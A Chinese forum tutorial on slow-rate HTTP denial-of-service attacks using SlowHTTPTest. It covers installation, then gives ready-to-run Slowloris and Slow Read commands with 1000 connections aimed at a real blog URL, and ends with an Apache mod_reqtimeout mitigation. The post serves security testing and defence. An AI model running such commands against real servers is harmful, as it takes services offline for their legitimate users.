找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

1363

积分

0

好友

185

主题
发表于 5 天前 | 查看: 15| 回复: 0

慢速DoS攻击是一种与传统高速洪水攻击截然不同的网络威胁。其核心并非通过巨大的流量带宽压垮目标,而是巧妙地利用协议机制,通过维持大量低速、耗时的连接来耗尽服务器的连接池、线程等关键资源,最终导致服务拒绝。

SlowHTTPTest 是一款集成了多种慢速攻击模式的测试工具,能够模拟 SlowlorisSlow HTTP POST 以及 Slow Read attack 等经典攻击手法。理解这些工具的工作原理,对于构建有效的网络安全防护体系至关重要。

安装 SlowHTTPTest

在 Kali Linux 系统中,可以通过包管理器直接安装:

apt-get install slowhttptest

安装命令截图

对于其他 Linux 发行版,通常需要从源码编译安装:

tar -xzvf slowhttptest-x.x.tar.gz
cd slowhttptest-x.x
./configure --prefix=PREFIX
make
sudo make install

查看工具帮助

安装完成后,可以通过 -h 参数查看完整的命令行选项:

slowhttptest -h

帮助信息截图

攻击模拟示例

⚠️ 警告:以下操作仅限在授权的测试环境或本地实验环境中进行,严禁对未经授权的任何目标使用。

1. Slowloris 模式攻击示例
该模式通过缓慢发送不完整的HTTP请求头来保持连接占用。

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://blog.bbskali.cn/index.html -x 24 -p 3

Slowloris攻击截图
当工具界面的 service available 状态变为 NO 时,表示目标服务已不可用,模拟攻击成功。

攻击成功状态截图

2. Slow Read 模式攻击示例
该模式通过极慢的速度读取服务器响应,消耗服务器发送缓冲区资源。

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u https://blog.bbskali.cn/index.html

防御措施与实践

以常见的 Apache HTTP Server 为例,可以通过修改配置文件来有效缓解此类慢速攻击。

  1. 启用 mod_reqtimeout 模块
    编辑 httpd.conf 配置文件,确保 mod_reqtimeout 模块已被启用(默认通常已启用,若被注释则移除行首的 # 号)。
    模块配置截图

  2. 配置超时与最小速率限制
    在配置文件中添加或修改 mod_reqtimeout 的配置指令,严格限制请求头和请求体的读取时间与最小速率。

    <IfModule reqtimeout_module>
        # 设置请求头必须在5-40秒内传输完毕,且传输速率不低于500字节/秒
        # 设置请求体必须在20秒内开始传输,且传输速率不低于500字节/秒
        RequestReadTimeout header=5-40,MinRate=500 body=20,MinRate=500
    </IfModule>

    此配置会强制中断那些传输过于缓慢的连接,从而释放被占用的资源,保障正常用户的访问。




上一篇:谷歌联手Meta研发TorchTPU:为TPU提供原生PyTorch支持,挑战CUDA生态
下一篇:SQL注入方法详解:从手工检测到盲注利用的渗透测试实战
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

GMT+8, 2025-12-24 20:53 , Processed in 0.378633 second(s), 40 queries , Gzip On.

Powered by Discuz! X3.5

© 2025-2025 云栈社区.

快速回复 返回顶部 返回列表